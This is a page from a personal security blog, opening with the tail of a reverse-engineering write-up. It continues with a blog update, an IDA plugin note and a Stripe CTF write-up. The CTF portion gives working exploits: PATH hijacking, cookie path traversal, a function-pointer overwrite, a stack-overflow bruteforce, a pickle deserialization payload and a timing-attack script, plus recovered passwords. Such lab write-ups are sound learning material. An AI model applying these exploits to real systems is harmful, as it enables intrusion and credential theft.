The program does not take a key as an input, only sound data. That means it will most likely generate and display a key based on the sound. Indeed, at the address 0x401963 we can see that the program uses MD5_Final to generate a MD5 digest and displays it in hex using a printf("%02x") loop. Let’s look at all the references to MD5_Update to understand how this MD5 digest is computed:

  • Just before the program main loop, the first call to MD5_Update hashes 1 constant byte 0x14
  • At each iteration of the program main loop, if the function analyzing the sound data returns the expected value (checked using a table mapping iteration number to expected value) MD5_Update is called using that expected value.
  • Just before the call to MD5_Final the constant byte 0x14 is hashed once again.

This second point is the most important. Basically, here is the simplified pseudocode of the program:

int expected_vals[22];

void init_expected() { // sub_400df4
    expected_vals[0] = '_';
    expected_vals[1] = '<';
    expected_vals[2] = 'P';
    // ...
    expected_vals[21] = 'G';
}

void mainloop() {
    int iter_count = 0;

    MD5_Update(0x14);
    while (iter_count < 22) {
        int ret = analyze_sound_data();
        if (ret == expected_vals[iter_count]) {
            iter_count++;
            MD5_Update(ret);
        }
     }
     MD5_Update(0x14);
     MD5_Final();
}

We can simply read all the expected values from the initialization function and compute the MD5 without even running the program! (which was lucky: it uses /dev/dsp which my system does not have…)

>>> import hashlib
>>> hashlib.md5('\x14_<P_Y5GYP<jGPY5GYP5CPG\x14').hexdigest()
'667e948a0285b25dafd2c58a2531f2c3'
2012
10.14

State of this blog

You may have noticed that I haven’t been posting a lot of articles on this blog recently.

For the last two years I’ve been spending most of my free time at LSE, the computer systems/security lab of the school I’m attending. We recently decided to open a blog dedicated to everything we do at the lab, from security contests writeups to tutorials. This means that I’m posting most of my work on that blog instead of here.

If you’re following this blog, you will probably be interested in following the LSE blog: http://blog.lse.epita.fr/

Some of my articles you may have missed:

My french readers might also be interested by the videos of 3 of my recent talks I did at our school during this year edition of LSE Summer Week. You can find the recordings on our Youtube channel.

If my studies go well I’ll be leaving LSE in 2013 for a final internship before getting my degree. I should start blogging more on this website then.

Thanks to everyone reading articles on this blog!

2012
03.22

Once upon a time, Stefan Esser from the Hitmen programmed an IDA loader plugin to be able to analyze DOL files, which is the executable format used for Gamecube and Wii. Builds are published for versions up to 5.2, but nothing more recent.

Fortunately they also released the source to their plugin, which allowed me (with some very minor modifications to the code to use linput_t instead of C FILE structures) to build a version of the IDA DOL loader plugin for IDA 6.1, the version I’m using in my day to day reverse engineering. Here is a link to this build.

Have fun with it!

That might be the shortest article I published on this blog…

2012
03.01

My Stripe CTF writeup

Recently Stripe (a startup trying to improve online payments for web developers) put online a fun CTF challenge with simple security exercises. Now that the challenge is done and the CTF is offline, I wanted to share my solutions with people who were interested in this CTF but were not able to solve it before the time limit.

Unfortunately I don’t have the original source code of the exercises here. I hope that the Stripe CTF organizers will publish those so that I can explain my exploits better 🙂

level01

The given binary executes system("date"); in order to display the date. system looks into the PATH environment variable to locate binaries. As an attacker, we can control PATH and make it point to a directory we control which contains a date executable file. Here is my solution:

$ ln -s /bin/sh date
$ PATH=.:$PATH /levels/level01

level02

The MOTD gives us some infos about this level: there is a web server running on localhost:80 which requires Digest authentication to access a PHP page of which we have the source. I don’t have the PHP source here but basically, it checked for the existence of a cookie, and if it exists it displays the contents of "/var/www/$cookie_value". Cookies can be manipulated by the attacker, so we can control the displayed file. Here is my solution:

$ curl -v -b user_details=../../home/level03/.password \
      -u level02:kxlVXUvzv --digest http://ctf.stri.pe/level02.php

level03

Things get a little harder. Here, we have a C binary which basically does this:

func_ptr table[4] = { func1, func2, func3, func4 };
int i = atoi(argv[1]);
if (i >= 4)
    error();
table[i]();

This code does not check if i is negative. We can use that to dereference a function pointer which was put in the stack later. It turns out we can control some part of the stack (our argv[2] is copied in a stack buffer), so it is just a matter of finding the right offset to control the function pointer dereference and finding the right function on which to jump. Luckily, one of the unused functions in the level03 binary is a wrapper for system(3) and we can use it to execute an arbitrary shell command. My solution:

/levels/level03 -27 "$(echo -ne "sh #\x5b\x87\x04\x08")"

Explanation: -27 if the offset to 4 characters after the start of the argv[2] copy, which contains our function pointer. The first 4 chars of argv[2] are the arbitrary command: sh followed by the start of a comment so that the sh binary does not freak out 🙂

level04

The basic example of a stack overflow: strcpy of a user controlled string without any length check. This should be trivial to exploit, but the presence of ASLR makes it a bit harder: the stack location in memory is randomized, making it hard to jump on our shellcode in the stack. To bypass that, there are two solutions: either find a jmp *%eax at a fixed address in memory (for example, in .text) and use it to overwrite the function return address so that the ret returns to the shellcode, or be hardcore and bruteforce the address. Both solutions were doable, and I went with the bruteforce because I did not think about the jmp *%eax in the first place 😛 .

Using stackbf2.c with the right parameters, exploiting this is trivial. Basically:

gcc brute.c
./a.out /levels/level04 1040

Note: while I was writing this article, w4kfu gave me a better solution: using ulimit -s unlimited makes the exploit possible using a ret2libc technique. Food for thought 🙂

level05

I still have the code of this exercise on my machine: level05.py.

For this level we have a “large” client/server Python application which uses a server to process HTTP queries, put data in a queue so that it can be processed by a worker, and get data back from the queue when it has been processed. The worker waits for data to be put in the queue, uppercases the data, then puts it back in the queue. The queue is basically a directory with “job” files in this format:

type: %s; data: %s; job: %s

Data is unserialized using this code:

parser = re.compile('^type: (.*?); data: (.*?); job: (.*?)$', re.DOTALL)
match = parser.match(serialized)
direction = match.group(1)
data = match.group(2)
job = pickle.loads(match.group(3))

The trick is to see that you can basically get a user controlled string for match.group(3) if you have "; job: " in your data. Python’s pickle module is not really done to unserialize user controlled stuff: it is very easy to make it do what you want as soon as you control what it unserializes.

You can control how an object is serialized using its __reduce__ method. I basically created an object with __reduce__ calling os.system("cp /home/level06/.password /tmp/1"), injected it as a “job” object into the queue, and got the password file copied where I wanted it.

level06

I also have the code for this exercise locally: level06.c

When I first saw the code I immediately thought “this must be exploited through a timing attack: count the number of characters written on stderr before data is written on stdout“. Unfortunately, it is not that easy: scheduling and pipe bufferization completely breaks all forms of basic timing you could use. I tried several methods to get the writes on stderr to block so that I could more precisely detect when the write on stdout was done, but did not manage it the first day.

Then, the day before the end of the CTF, I thought a bit more about it (I really wanted a free t-shirt :D) and the solution came to my mind: prefilling the pipe buffer so that we can control after how much characters it blocks. That way we can see if the write on stdout was done before a certain number of characters on stderr. That way we can bruteforce one character by one character to get the full password to level06. Here is my exploit code which checks if the start of the password matches argv[1]:

import os
import signal
import sys

CONSTSIZE = 33
PIPEBUFSIZE = 65536

orig_guess = guess = sys.argv[1]

guess += "a" # because we need one more char to be sure

out, out_child = os.pipe()
err, err_child = os.pipe()
pid = os.fork()
if not pid:
    os.write(err_child, '\x00' * (65503 - len(orig_guess)))
    os.dup2(out_child, 1)
    os.dup2(err_child, 2)
    os.execl('/levels/level06', 'level06', '/home/the-flag/.password', guess)

def alarmed(*a):
    print 'Success: %r' % orig_guess
    os.kill(pid, 9)
    sys.exit(0)

signal.signal(signal.SIGALRM, alarmed)
signal.alarm(1)
os.read(out, 1)

print 'Fail: %r' % orig_guess
os.kill(pid, 9)
sys.exit(1)

Final key: theflagl0eFTtT5oi0nOTxO5

Conclusion

Overall, this was a really fun CTF organized by the guys Stripe. It’s really too bad that it was not longer (if I did not get stuck on that last exercise like an idiot I would have basically done it in 5 hours) with more complex exercises (remote exploitation is always fun, reverse engineering too 🙂 ). Still, it’s a great learning tool for people who are not really into computer security and local exploitation, and I’d like to see more people do that kind of stuff.